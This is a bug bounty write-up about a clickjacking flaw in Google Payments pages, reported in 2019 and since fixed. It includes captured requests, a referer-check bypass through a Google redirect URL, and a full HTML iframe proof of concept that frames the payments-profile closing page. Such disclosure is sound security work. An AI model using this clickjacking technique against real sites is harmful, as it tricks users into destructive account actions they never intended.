Google Bug Bounty: Clickjacking on Google Payment (1337$)

Hi everyone!
I would like to share about the first Bug I reported in October 2019 to Google Security Team.

I started participating in Google’s vulnerability reward program in October 2019, and at that time I decided to look for vulnerabilities in Google’s core products such as Google Mail, Google Payments, Google Play, etc. During the search for bugs I found something interesting on the Google payments page. While looking for clickjacking vulnerabilities on Google’s payment pages, I found many sensitive pages that missed the x-frame-options and the CSP frame-ancestors options in the respone header. Sensitive pages that I mean as when adding, editing and deleting payment methods.

Payment methods

For example, when I want to delete one of my payment methods, the request will look like the following:

POST /payments/u/0/fix_instrument?cn=%24p_e981jj735kuq1&hostOrigin=aHR0cHM6Ly9wYXkuZ29vZ2xlLmNvbQ..&ipi= xxx &hl=id&mm=p&si= xxx &style=%3Apc%3D%23fff%3Bnav%3DPT%3Bm2&cst=xxx&wst=xxx&icn=%24p_u76q6apzv3lf0&initiatorFrameKey=mainWidget_%3A0Iframe&initiatorElementId=%3Af
Host: payments.google.com
Referer: https://pay.google.com/gp/w/u/0/home/paymentmethods
Content-Type: application/x-www-form-urlencoded
Content-Length: 138

ebp=ALFTWs23DPSeaWidOiluFwricch3nCi813sn%2Fpt3YGABPhow6IEfE%2F7UwXckzVsOCN8cOldnuWPnEPfgi6UPfprH28FNtB6UEiX5LJgppnpY6Kr7rzoiDZE%3D&sri=-23

The referer value must be in the google.com domain. Otherwise, there will be an x-frame-options: DENY in the response header. So, I can using Google redirection to bypass the referer check.

After I embed the URL into my web page, the page appears in my own account, but there was an error in another account. Why did it happen?
Ya, there is a <ebp> token that only works on the account itself. So, if the URL is embedded on my web page, the page will only appear on my own account and will be an error for other users.

After a few minutes, I found a page to close payments profile on the payment profile page with the <ebp> token that can be used for other users. To find this page, you can click Settings, under “Payments profile status” click Close payments profile. The request uses the GET method and the URL will be as follows:

https://payments.google.com/payments/u/0/wipeout?cn=%24p_vy5mp4vsqdid3&hostOrigin=aHR0cHM6Ly9wYXkuZ29vZ2xlLmNvbQ..&ipi=g3iytz4f3qsu&hl=en_US&mm=p&si=2323873918715655&style=%3Anav%3DPT%3Bpc%3D%23fff%3Bm2&cst=1570936125181&wst=1570936087509&icn=%24p_4l9irwmby5rv0&initiatorFrameKey=standalone-container-main-widgetIframe&initiatorElementId=%3A96&ebp=ALFTWs3IvqiQ%2FycNfyzF6TT3peRaqTIuVE2nwmpiTy5R69sTuyj4%2BCSv3611naiwZEHme1VwObdLVAHUN5iPfw7FDR0HmXRgIBA1C63FUj9sqpgG5z5icYnYEFRlr3w3GlQWjitfZRmd&sri=-238

When we embed the URL into an iframe, the value of the iframe <id> must be “standalone-container-main-widgetIframe“. Otherwise, the button on the page doesn’t work. After all, the simple HTML code will be as follows:

<!DOCTYPE html>
<html>
<body>
<iframe style="border: 0px none; vertical-align: initial; display: block; width: 100%; height: 1538px; min-height: calc(-184px + 100vh); position: static; top: auto; visibility: visible; z-index: auto; transition: all 0s ease 0s;" src="https://www.google.com//url?q=https://payments.google.com/payments/u/0/wipeout?cn%3D%2524p_f7murrkl9qwd4%26hostOrigin%3DaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ..%26ipi%3D95sxmy633y8w%26hl%3Din%26mm%3Dp%26si%3D1774720503610940%26style%3D%253Anav%253DPT%253Bpc%253D%2523fff%253Bm2%26cst%3D1572429193822%26wst%3D1572429183570%26icn%3D%2524p_7d008azcuy9h1%26initiatorFrameKey%3Dstandalone-container-main-widgetIframe%26initiatorElementId%3D%253A9p%26ebp%3DALFTWs1JhhMtxPPbLdcbPfylZAaaa93uVOiVjkgkKTAAbWB6waytGn5I%252F%252F37U%252FNIKp0ayP74jC4xMDyr%252BVx%252FUuTQPirHj7nBSPnBKewJGW5oyFfR%252FIZUC5RafZVEl2WNwWqqm%252FjjY%252FK%252F%26sri%3D-265&sa=D&sntz=1&usg=AFQjCNGv16lGowHqc2E--dLugMX7x8lLOQ" id="standalone-container-main-widgetIframe" name="standalone-container-main-widgetIframe" title="" frameborder="0">
</iframe>
</body>
</html>
PoC

After the Google payments profile is successfully closed, a notification will be sent to the email as follows:

Email Notification

Thanks for reading…. I’m looking forward to sharing more of my adventures in the future, stay tuned!

Timeline:

  • Oct 13, 2019: Report to Google
  • Oct 14, 2019: Triaged
  • Oct 17, 2019: Nice catch! (P2 -> Accepted)
  • Oct 30, 2019: Bounty awarded ($1337)
  • ———- BUG FIXED ———–

Share:

More Posts